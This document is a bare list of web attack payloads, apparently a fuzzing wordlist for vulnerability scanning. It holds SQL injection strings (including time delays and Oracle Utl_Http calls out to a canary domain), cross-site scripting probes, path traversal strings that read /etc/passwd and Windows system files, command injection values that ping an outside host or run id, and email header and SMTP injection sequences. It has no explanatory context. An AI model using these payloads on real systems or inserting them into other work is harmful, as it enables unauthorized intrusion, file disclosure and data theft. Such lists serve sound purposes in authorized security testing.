'
'--
' or 1=1--
1 or 1=1--
' or 1 in (@@version)--
1 or 1 in (@@version)--
'; waitfor delay '0:30:0'--
1; waitfor delay '0:30:0'--
'||Utl_Http.request('http://intruder.dns.canary.domain') from dual--
1||Utl_Http.request('http://intruder.dns.canary.domain') from dual--
xsstest
xsstest%00"<>'
</foo>
<foo></foo>
))))))))))
../../../../../../../../../../etc/passwd
../../../../../../../../../../boot.ini
..\..\..\..\..\..\..\..\..\..\etc\passwd
..\..\..\..\..\..\..\..\..\..\boot.ini
../../../../../../../../../../windows/win.ini
..\..\..\..\..\..\..\..\..\..\windows\win.ini
|| ping -i 30 ping.canary.domain ; x || ping -n 30 ping.canary.domain &
| ping -i 30 ping.canary.domain |
| ping -n 30 ping.canary.domain |
& ping -i 30 ping.canary.domain &
& ping -n 30 ping.canary.domain &
; ping ping.canary.domain ;
%0a ping -i 30 ping.canary.domain %0a
`ping ping.canary.domain`
| id
& id
; id
%0a id %0a
`id`
;echo 111111
echo 111111
response.write 111111
:response.write 111111
http://intruder.dns.canary.domain/
intruder@canary.domain%0aCc:intruder@canary.domain
intruder@canary.domain%0d%0aCc:intruder@canary.domain
intruder@canary.domain%0aBcc:intruder@canary.domain
intruder@canary.domain%0d%0aBcc:intruder@canary.domain
%0aDATA%0afoo%0a%2e%0aMAIL+FROM:+intruder@canary.domain%0aRCPT+TO:+intruder@canary.domain%0aDATA%0aFrom:+intruder@canary.domain%0aTo:+intruder@canary.domain%0aSubject:+tst%0afoo%0a%2e%0a
%0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+intruder@canary.domain%0d%0aRCPT+TO:+intruder@canary.domain%0d%0aDATA%0d%0aFrom:+intruder@canary.domain%0d%0aTo:+intruder@canary.domain%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a